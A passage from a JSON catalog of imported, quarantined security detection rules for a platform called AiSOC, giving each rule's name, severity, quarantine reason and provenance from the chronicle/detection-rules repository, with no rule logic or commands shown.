"license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detect_service_creation_by_metasploit_on_victim_machine.yaral" } }, { "id": "chronicle-detection-rules-detect-when-a-process-tries-to-allow-execution-of-malicious-email-attachments", "type": "detection", 
"name": "detect_when_a_process_tries_to_allow_execution_of_malicious_email_attachments", "description": "detect_when_a_process_tries_to_allow_execution_of_malicious_email_attachments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-when-a-process-tries-to-allow-execution-of-malicious-email-attachments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_when_a_process_tries_to_allow_execution_of_malicious_email_attachments", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detect_when_a_process_tries_to_allow_execution_of_malicious_e_mail_attachments.yaral" } }, { "id": "chronicle-detection-rules-detect-when-the-guest-account-is-enabled", "type": "detection", "name": "detect_when_the_guest_account_is_enabled", "description": "detect_when_the_guest_account_is_enabled", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-when-the-guest-account-is-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"detect_when_the_guest_account_is_enabled", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detect_when_the_guest_account_is_enabled.yaral" } }, { "id": "chronicle-detection-rules-detect-windows-password-policy-changes", "type": "detection", "name": "detect_windows_password_policy_changes", "description": "detect_windows_password_policy_changes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detect-windows-password-policy-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detect_windows_password_policy_changes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detect_windows_password_policy_changes.yaral" } }, { "id": "chronicle-detection-rules-detecting-gamaredon-groups-cc-servers-ip-addresses-and-domains-proxy", "type": "detection", "name": "detecting_gamaredon_groups_cc_servers_ip_addresses_and_domains_proxy", "description": "detecting_gamaredon_groups_cc_servers_ip_addresses_and_domains_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": 
false, "path": "detections/chronicle-imports/_quarantine/detecting-gamaredon-groups-cc-servers-ip-addresses-and-domains-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detecting_gamaredon_groups_cc_servers_ip_addresses_and_domains_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/detecting_gamaredon_group_s_c_c_servers_ip_addresses_and_domains__proxy.yaral" } }, { "id": "chronicle-detection-rules-detecting-phishing-domains-proxy", "type": "detection", "name": "detecting_phishing_domains_proxy", "description": "detecting_phishing_domains_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detecting-phishing-domains-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detecting_phishing_domains_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/proxy/detecting_phishing_domains__proxy.yaral" } }, { "id": "chronicle-detection-rules-detection-of-com-hijacking", "type": "detection", "name": "detection_of_com_hijacking", "description": "detection_of_com_hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detection-of-com-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detection_of_com_hijacking", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/detection_of_com_hijacking.yaral" } }, { "id": "chronicle-detection-rules-detection-of-powershell-execution-via-dll", "type": "detection", "name": "detection_of_powershell_execution_via_dll", "description": "detection_of_powershell_execution_via_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detection-of-powershell-execution-via-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detection_of_powershell_execution_via_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detection_of_powershell_execution_via_dll.yaral" } }, { "id": "chronicle-detection-rules-detection-of-safetykatz", "type": "detection", "name": 
"detection_of_safetykatz", "description": "detection_of_safetykatz", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detection-of-safetykatz.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detection_of_safetykatz", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detection_of_safetykatz.yaral" } }, { "id": "chronicle-detection-rules-detection-of-winrs-usage", "type": "detection", "name": "detection_of_winrs_usage", "description": "detection_of_winrs_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detection-of-winrs-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detection_of_winrs_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/detection_of_winrs_usage.yaral" } }, { "id": 
"chronicle-detection-rules-detects-coronavirus-used-in-malicious-campaigns", "type": "detection", "name": "detects_coronavirus_used_in_malicious_campaigns", "description": "detects_coronavirus_used_in_malicious_campaigns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detects-coronavirus-used-in-malicious-campaigns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detects_coronavirus_used_in_malicious_campaigns", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detects_coronavirus_used_in_malicious_campaigns.yaral" } }, { "id": "chronicle-detection-rules-detects-local-user-creation", "type": "detection", "name": "detects_local_user_creation", "description": "detects_local_user_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detects-local-user-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detects_local_user_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/detects_local_user_creation.yaral" } }, { "id": "chronicle-detection-rules-detects-malware-acrord32exe-execution-process", "type": "detection", "name": "detects_malware_acrord32exe_execution_process", "description": "detects_malware_acrord32exe_execution_process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detects-malware-acrord32exe-execution-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detects_malware_acrord32exe_execution_process", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/detects_malware_acrord32_exe_execution_process.yaral" } }, { "id": "chronicle-detection-rules-detects-powershell-attack-via-av-ids", "type": "detection", "name": "detects_powershell_attack_via_av_ids", "description": "detects_powershell_attack_via_av_ids", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/detects-powershell-attack-via-av-ids.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by 
the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "detects_powershell_attack_via_av_ids", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/antivirus/detects_powershell_attack__via_av_ids.yaral" } }, { "id": "chronicle-detection-rules-direct-autorun-keys-modification", "type": "detection", "name": "direct_autorun_keys_modification", "description": "direct_autorun_keys_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/direct-autorun-keys-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "direct_autorun_keys_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/direct_autorun_keys_modification.yaral" } }, { "id": "chronicle-detection-rules-disable-internal-tools-or-feature-in-registry", "type": "detection", "name": "disable_internal_tools_or_feature_in_registry", "description": "disable_internal_tools_or_feature_in_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/disable-internal-tools-or-feature-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "disable_internal_tools_or_feature_in_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/disable_internal_tools_or_feature_in_registry.yaral" } }, { "id": "chronicle-detection-rules-disable-services-startup-detected", "type": "detection", "name": "disable_services_startup_detected", "description": "disable_services_startup_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/disable-services-startup-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "disable_services_startup_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/disable_services_startup_detected.yaral" } }, { "id": "chronicle-detection-rules-diskshadow-and-vshadow-launch-detection", "type": "detection", "name": "diskshadow_and_vshadow_launch_detection", "description": "diskshadow_and_vshadow_launch_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/diskshadow-and-vshadow-launch-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "diskshadow_and_vshadow_launch_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/diskshadow_and_vshadow_launch_detection.yaral" } }, { "id": "chronicle-detection-rules-dns-query-to-recently-created-domain", "type": "detection", "name": "dns_query_to_recently_created_domain", "description": "dns_query_to_recently_created_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/dns-query-to-recently-created-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "dns_query_to_recently_created_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/dns_query_to_recently_created_domain.yaral" } }, { "id": "chronicle-detection-rules-dns-txt-answer-with-possible-execution-strings", "type": "detection", "name": "dns_txt_answer_with_possible_execution_strings", "description": 
"dns_txt_answer_with_possible_execution_strings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/dns-txt-answer-with-possible-execution-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "dns_txt_answer_with_possible_execution_strings", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/dns/dns_txt_answer_with_possible_execution_strings.yaral" } }, { "id": "chronicle-detection-rules-docker-user-agent", "type": "detection", "name": "docker_user_agent", "description": "docker_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/docker-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "docker_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/docker_user_agent.yaral" } }, { "id": "chronicle-detection-rules-domain-prevalence", "type": "detection", 
"name": "domain_prevalence", "description": "domain_prevalence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/domain-prevalence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "domain_prevalence", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/domain_prevalence.yaral" } }, { "id": "chronicle-detection-rules-download-from-suspicious-dyndns-hosts", "type": "detection", "name": "download_from_suspicious_dyndns_hosts", "description": "download_from_suspicious_dyndns_hosts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/download-from-suspicious-dyndns-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "download_from_suspicious_dyndns_hosts", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/download_from_suspicious_dyndns_hosts.yaral" } }, { "id": 
"chronicle-detection-rules-download-from-suspicious-tld", "type": "detection", "name": "download_from_suspicious_tld", "description": "download_from_suspicious_tld", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/download-from-suspicious-tld.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "download_from_suspicious_tld", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/download_from_suspicious_tld.yaral" } }, { "id": "chronicle-detection-rules-draytek-preauth-remote-root-rce", "type": "detection", "name": "draytek_preauth_remote_root_rce", "description": "draytek_preauth_remote_root_rce", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/draytek-preauth-remote-root-rce.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "draytek_preauth_remote_root_rce", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/draytek_pre_auth_remote_root_rce.yaral" } }, { "id": "chronicle-detection-rules-dridex-process-pattern", "type": "detection", "name": "dridex_process_pattern", "description": "dridex_process_pattern", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/dridex-process-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "dridex_process_pattern", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/dridex_process_pattern.yaral" } }, { "id": "chronicle-detection-rules-dynamic-data-exchange-spawning-commandline-or-powershell-detector-sysmon-behavio", "type": "detection", "name": "dynamic_data_exchange_spawning_commandline_or_powershell_detector_sysmon_behavior", "description": "dynamic_data_exchange_spawning_commandline_or_powershell_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/dynamic-data-exchange-spawning-commandline-or-powershell-detector-sysmon-behavio.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "chronicle/detection-rules", "source_id": "dynamic_data_exchange_spawning_commandline_or_powershell_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/dynamic_data_exchange_spawning_command_line_or_powershell_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-ekanssnake-ransomware-sysmon-detection", "type": "detection", "name": "ekanssnake_ransomware_sysmon_detection", "description": "ekanssnake_ransomware_sysmon_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/ekanssnake-ransomware-sysmon-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "ekanssnake_ransomware_sysmon_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ekans_snake_ransomware__sysmon_detection.yaral" } }, { "id": "chronicle-detection-rules-emotet-process-creation", "type": "detection", "name": "emotet_process_creation", "description": "emotet_process_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": 
false, "path": "detections/chronicle-imports/_quarantine/emotet-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "emotet_process_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/emotet_process_creation.yaral" } }, { "id": "chronicle-detection-rules-emotet-through-word-document-sysmon-behavior", "type": "detection", "name": "emotet_through_word_document_sysmon_behavior", "description": "emotet_through_word_document_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/emotet-through-word-document-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "emotet_through_word_document_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/emotet_through_word_document__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-empire-monkey", "type": "detection", "name": "empire_monkey", "description": "empire_monkey", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, 
"playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/empire-monkey.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "empire_monkey", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/empire_monkey.yaral" } }, { "id": "chronicle-detection-rules-empire-powershell-uac-bypass", "type": "detection", "name": "empire_powershell_uac_bypass", "description": "empire_powershell_uac_bypass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/empire-powershell-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "empire_powershell_uac_bypass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/empire_powershell_uac_bypass.yaral" } }, { "id": "chronicle-detection-rules-empire-user-agents-proxy", "type": "detection", "name": "empire_user_agents_proxy", "description": "empire_user_agents_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": 
[], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/empire-user-agents-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "empire_user_agents_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/empire_user_agents__proxy.yaral" } }, { "id": "chronicle-detection-rules-enabling-rdp-remotely-using-psexec", "type": "detection", "name": "enabling_rdp_remotely_using_psexec", "description": "enabling_rdp_remotely_using_psexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/enabling-rdp-remotely-using-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "enabling_rdp_remotely_using_psexec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/enabling_rdp_remotely_using_psexec.yaral" } }, { "id": "chronicle-detection-rules-encoded-frombase64string", "type": "detection", "name": "encoded_frombase64string", "description": 